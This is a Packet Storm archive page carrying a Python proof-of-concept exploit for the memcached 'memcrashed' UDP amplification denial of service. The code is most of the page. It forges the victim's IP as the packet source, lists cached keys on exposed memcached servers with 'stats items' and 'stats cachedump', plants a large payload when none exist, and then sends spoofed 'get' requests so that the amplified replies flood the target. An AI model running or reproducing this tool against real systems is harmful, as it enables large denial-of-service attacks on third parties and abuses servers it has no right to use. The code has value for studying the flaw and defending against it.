Twenty Year Anniversary

Memcached memcrashed Denial Of Service

Memcached memcrashed Denial Of Service
Posted Mar 6, 2018
Authored by Alex Conrey

This is a proof of concept exploit for the memcached denial of service vulnerability.

tags | exploit, denial of service, proof of concept
MD5 | 2b76cf893e1e529dcdcc9dfd0e852de4

Memcached memcrashed Denial Of Service

Change Mirror Download
# Written by Alex Conrey
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This was created to better understand the memcrashed exploit
# brought to light thanks to CloudFlare.
# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
#
# Please sysadmin responsibly.

import requests
import memcache
import re

from scapy.all import *

# Vulnerable memcached server list
SERVER_LIST = [
'172.17.0.2:11211',
]

# Destination
TARGET = '1.2.3.4'

# optional payload to set if no keys exist
payload = requests.get('https://google.com').text
payload_key = 'fuckit'

# this forces payload to load into memory for being extra-evil and efficient
if not payload:
print 'Could not import payload, continuing anyway'

try:
for server in SERVER_LIST:
if ':' in server:
server = server.split(':')[0]

ip = IP(src=TARGET, dst=server)
packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'

# fetch known keys by id
statitems_packet = packet_base.format('stats items')
udp = UDP(sport=50000, dport=11211)/statitems_packet
keyids = []
resp = sr1(ip/udp)
for key in str(resp.payload).split('\r\n'):
# Skip first line which has hex in it (I'm lazy)
if 'age' in key:
key = key.split(':')[1]
keyids.append(key)

# fetch names for keys by id
keys = []
for kid in keyids:
query = 'stats cachedump {0} 100'.format(kid)
keyid_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/keyid_packet
resp = str(sr1(ip/udp).payload).split('\r\n')
for key in resp:
if 'ITEM' in key:
res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
keys.append(res.group('keyname'))

# if keys not present on target, make one
if not keys:
mc = memcache.Client([server],debug=False)
mc.set(payload_key, payload)
keys.append(payload_key)

# iterate thru known keys and blast away
for key in keys:
query = 'get {0}'.format(key)
fun_packet = packet_base.format(query)
udp = UDP(sport=50000, dport=11211)/fun_packet
sr1(ip/udp)

except Exception:
raise

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close